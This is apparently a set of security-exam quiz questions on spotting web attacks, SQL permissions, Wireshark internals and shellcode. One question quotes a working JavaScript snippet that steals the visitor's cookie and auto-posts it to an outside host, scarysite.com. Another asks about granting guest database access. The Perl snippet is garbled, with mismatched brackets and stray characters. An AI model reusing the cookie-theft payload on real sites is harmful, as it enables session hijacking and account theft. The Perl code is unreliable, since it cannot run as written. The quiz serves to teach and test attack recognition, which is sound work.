Gerald is a web security consultant for Protectors International. Gerald’s main responsibility is to
search the Internet for malicious and deceitful sites that the public should be aware of. Gerald was
tipped off about a particular site and is now looking over its source code in a protected

environment. Gerald finds the following snippet particularly interesting. What has Gerald stumbled
upon?
<script>
document.write(‘<form name=hack method=post action=”http://
scarysite.com/getit.php”>
<input type=hidden name=sid value=”‘ + escape(document.cookie) +
‘”>’);
document.hack.submit();
</script>

What compression library is used by wiretap, the packet analyzer reader for Wireshark?

What will the following SQL command accomplish?
USE Accounting
GO
EXECUTE
sp_grantdbaccess guest

What is the following PERL script trying to accomplish?

sub mycode_string {
join(“”
map(‘$_ > 255 ?
sprintf(“\\x{%04x]”, $_) :
chr($_) = ~ /[[:cntrl:]]/ ?
sprintf(\\x%02X”, $_) :
chr($_)
} unpack(“u*”, $_[0]))l
}

When a developer is creating port binding shell code, why should he/she not use the NULL
characters?